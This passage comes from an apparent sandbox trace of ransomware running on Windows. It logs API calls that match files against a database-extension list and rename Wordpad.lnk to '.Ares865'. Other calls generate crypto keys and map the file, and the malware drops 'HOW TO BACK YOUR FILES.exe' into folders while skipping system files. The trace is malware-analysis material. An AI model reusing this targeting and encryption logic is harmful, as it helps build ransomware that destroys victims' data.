lpString2="dad") returned 1 [0068.394] lstrlenW (lpString="dadiagrams") returned 10 [0068.394] lstrcmpiW (lpString1="ordpad.lnk", lpString2="dadiagrams") returned 1 [0068.394] lstrlenW (lpString="daschema") returned 8 [0068.394] lstrcmpiW (lpString1="dpad.lnk", lpString2="daschema") returned 1 [0068.394] lstrlenW (lpString="db-journal") returned 10 [0068.394] lstrcmpiW (lpString1="ordpad.lnk", lpString2="db-journal") returned 1 [0068.394] lstrlenW (lpString="db-shm") returned 6 [0068.394] lstrcmpiW (lpString1="ad.lnk", lpString2="db-shm") returned -1 [0068.394] lstrlenW (lpString="db-wal") returned 6 [0068.394] lstrcmpiW (lpString1="ad.lnk", lpString2="db-wal") returned -1 [0068.394] lstrlenW (lpString="dbc") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0068.394] lstrlenW (lpString="dbs") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0068.394] lstrlenW (lpString="dbt") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0068.394] lstrlenW (lpString="dbv") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0068.394] lstrlenW (lpString="dbx") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0068.395] lstrlenW (lpString="dcb") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0068.395] lstrlenW (lpString="dct") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0068.395] lstrlenW (lpString="dcx") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0068.395] lstrlenW (lpString="ddl") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0068.395] lstrlenW (lpString="dlis") returned 4 [0068.395] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0068.395] lstrlenW (lpString="dp1") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0068.395] lstrlenW (lpString="dqy") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0068.395] lstrlenW (lpString="dsk") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0068.395] lstrlenW (lpString="dsn") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0068.395] lstrlenW (lpString="dtsx") returned 4 [0068.395] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0068.395] lstrlenW (lpString="dxl") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0068.395] lstrlenW (lpString="eco") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0068.395] lstrlenW (lpString="ecx") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0068.395] lstrlenW (lpString="edb") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0068.395] lstrlenW (lpString="epim") returned 4 [0068.395] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0068.395] lstrlenW (lpString="fcd") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0068.395] lstrlenW (lpString="fdb") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0068.395] lstrlenW (lpString="fic") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0068.395] lstrlenW (lpString="flexolibrary") returned 12 [0068.395] lstrlenW (lpString="fm5") returned 3 [0068.395] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0068.396] lstrlenW (lpString="fmp") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0068.396] lstrlenW (lpString="fmp12") returned 5 [0068.396] lstrcmpiW (lpString1="d.lnk", lpString2="fmp12") returned -1 [0068.396] lstrlenW (lpString="fmpsl") returned 5 [0068.396] lstrcmpiW (lpString1="d.lnk", lpString2="fmpsl") returned -1 [0068.396] lstrlenW (lpString="fol") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0068.396] lstrlenW (lpString="fp3") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0068.396] lstrlenW (lpString="fp4") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0068.396] lstrlenW (lpString="fp5") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0068.396] lstrlenW (lpString="fp7") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0068.396] lstrlenW (lpString="fpt") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0068.396] lstrlenW (lpString="frm") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0068.396] lstrlenW (lpString="gdb") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.396] lstrlenW (lpString="gdb") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.396] lstrlenW (lpString="grdb") returned 4 [0068.396] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0068.396] lstrlenW (lpString="gwi") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0068.396] lstrlenW (lpString="hdb") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0068.396] lstrlenW (lpString="his") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0068.396] lstrlenW (lpString="ib") returned 2 [0068.396] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0068.396] lstrlenW (lpString="idb") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0068.396] lstrlenW (lpString="ihx") returned 3 [0068.396] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0068.397] lstrlenW (lpString="itdb") returned 4 [0068.397] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0068.397] lstrlenW (lpString="itw") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0068.397] lstrlenW (lpString="jet") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0068.397] lstrlenW (lpString="jtx") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0068.397] lstrlenW (lpString="kdb") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0068.397] lstrlenW (lpString="kexi") returned 4 [0068.397] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0068.397] lstrlenW (lpString="kexic") returned 5 [0068.397] lstrcmpiW (lpString1="d.lnk", lpString2="kexic") returned -1 [0068.397] lstrlenW (lpString="kexis") returned 5 [0068.397] lstrcmpiW (lpString1="d.lnk", lpString2="kexis") returned -1 [0068.397] lstrlenW (lpString="lgc") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0068.397] lstrlenW (lpString="lwx") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0068.397] lstrlenW (lpString="maf") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0068.397] lstrlenW (lpString="maq") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0068.397] lstrlenW (lpString="mar") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0068.397] lstrlenW (lpString="marshal") returned 7 [0068.397] lstrcmpiW (lpString1="pad.lnk", lpString2="marshal") returned 1 [0068.397] lstrlenW (lpString="mas") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0068.397] lstrlenW (lpString="mav") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0068.397] lstrlenW (lpString="maw") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0068.397] lstrlenW (lpString="mdbhtml") returned 7 [0068.397] lstrcmpiW (lpString1="pad.lnk", lpString2="mdbhtml") returned 1 [0068.397] lstrlenW (lpString="mdn") returned 3 [0068.397] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0068.397] lstrlenW (lpString="mdt") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0068.398] lstrlenW (lpString="mfd") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0068.398] lstrlenW (lpString="mpd") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0068.398] lstrlenW (lpString="mrg") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0068.398] lstrlenW (lpString="mud") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0068.398] lstrlenW (lpString="mwb") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0068.398] lstrlenW (lpString="myd") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0068.398] lstrlenW (lpString="ndf") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0068.398] lstrlenW (lpString="nnt") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0068.398] lstrlenW (lpString="nrmlib") returned 6 [0068.398] lstrcmpiW (lpString1="ad.lnk", lpString2="nrmlib") returned -1 [0068.398] lstrlenW (lpString="ns2") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0068.398] lstrlenW (lpString="ns3") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0068.398] lstrlenW (lpString="ns4") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0068.398] lstrlenW (lpString="nsf") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0068.398] lstrlenW (lpString="nv") returned 2 [0068.398] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0068.398] lstrlenW (lpString="nv2") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0068.398] lstrlenW (lpString="nwdb") returned 4 [0068.398] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0068.398] lstrlenW (lpString="nyf") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0068.398] lstrlenW (lpString="odb") returned 3 [0068.398] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.398] lstrlenW (lpString="odb") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.399] lstrlenW (lpString="oqy") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0068.399] lstrlenW (lpString="ora") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0068.399] lstrlenW (lpString="orx") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0068.399] lstrlenW (lpString="owc") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0068.399] lstrlenW (lpString="p96") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0068.399] lstrlenW (lpString="p97") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0068.399] lstrlenW (lpString="pan") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0068.399] lstrlenW (lpString="pdb") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0068.399] lstrlenW (lpString="pdm") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0068.399] lstrlenW (lpString="pnz") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0068.399] lstrlenW (lpString="qry") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0068.399] lstrlenW (lpString="qvd") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0068.399] lstrlenW (lpString="rbf") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0068.399] lstrlenW (lpString="rctd") returned 4 [0068.399] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0068.399] lstrlenW (lpString="rod") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0068.399] lstrlenW (lpString="rodx") returned 4 [0068.399] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0068.399] lstrlenW (lpString="rpd") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0068.399] lstrlenW (lpString="rsd") returned 3 [0068.399] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0068.399] lstrlenW (lpString="sas7bdat") returned 8 [0068.399] lstrcmpiW (lpString1="dpad.lnk", lpString2="sas7bdat") returned -1 [0068.400] lstrlenW (lpString="sbf") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0068.400] lstrlenW (lpString="scx") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0068.400] lstrlenW (lpString="sdb") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0068.400] lstrlenW (lpString="sdc") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0068.400] lstrlenW (lpString="sdf") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0068.400] lstrlenW (lpString="sis") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0068.400] lstrlenW (lpString="spq") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0068.400] lstrlenW (lpString="te") returned 2 [0068.400] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0068.400] lstrlenW (lpString="teacher") returned 7 [0068.400] lstrcmpiW (lpString1="pad.lnk", lpString2="teacher") returned -1 [0068.400] lstrlenW (lpString="tmd") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0068.400] lstrlenW (lpString="tps") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0068.400] lstrlenW (lpString="trc") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.400] lstrlenW (lpString="trc") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.400] lstrlenW (lpString="trm") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0068.400] lstrlenW (lpString="udb") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0068.400] lstrlenW (lpString="udl") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0068.400] lstrlenW (lpString="usr") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0068.400] lstrlenW (lpString="v12") returned 3 [0068.400] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0068.400] lstrlenW (lpString="vis") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0068.401] lstrlenW (lpString="vpd") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0068.401] lstrlenW (lpString="vvv") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0068.401] lstrlenW (lpString="wdb") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0068.401] lstrlenW (lpString="wmdb") returned 4 [0068.401] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0068.401] lstrlenW (lpString="wrk") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0068.401] lstrlenW (lpString="xdb") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0068.401] lstrlenW (lpString="xld") returned 3 [0068.401] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0068.401] lstrlenW (lpString="xmlff") returned 5 [0068.401] lstrcmpiW (lpString1="d.lnk", lpString2="xmlff") returned -1 [0068.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.Ares865") returned 70 [0068.401] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\wordpad.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\wordpad.lnk.ares865"), dwFlags=0x1) returned 1 [0068.402] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\wordpad.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.402] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1322) returned 1 [0068.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0068.403] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.404] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.404] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.404] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x120 [0068.405] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x190000 [0068.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.408] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.408] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.408] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.409] CloseHandle (hObject=0x120) returned 1 [0068.409] CloseHandle (hObject=0x154) returned 1 [0068.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0068.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.409] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d25b9f8, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x3d25b9f8, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x3d2cde19, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wordpad.lnk", cAlternateFileName="")) returned 0 [0068.409] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0068.409] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0068.409] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0068.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0068.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0068.409] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned 69 [0068.409] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0068.409] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.409] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.410] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.410] GetLastError () returned 0x0 [0068.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0068.410] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0068.410] CloseHandle (hObject=0x118) returned 1 [0068.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0068.410] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.410] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0068.410] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.410] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0068.410] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.411] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.411] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.411] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0068.411] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.411] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.411] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d776877, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8d776877, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8d7c2b37, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0068.411] lstrlenW (lpString="desktop.ini") returned 11 [0068.411] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*") returned 71 [0068.411] lstrcpyW (in: lpString1=0x2cce48c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0068.411] lstrlenW (lpString="desktop.ini") returned 11 [0068.411] lstrlenW (lpString="Ares865") returned 7 [0068.411] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0068.411] lstrlenW (lpString=".dll") returned 4 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0068.411] lstrlenW (lpString=".lnk") returned 4 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0068.411] lstrlenW (lpString=".ini") returned 4 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0068.411] lstrlenW 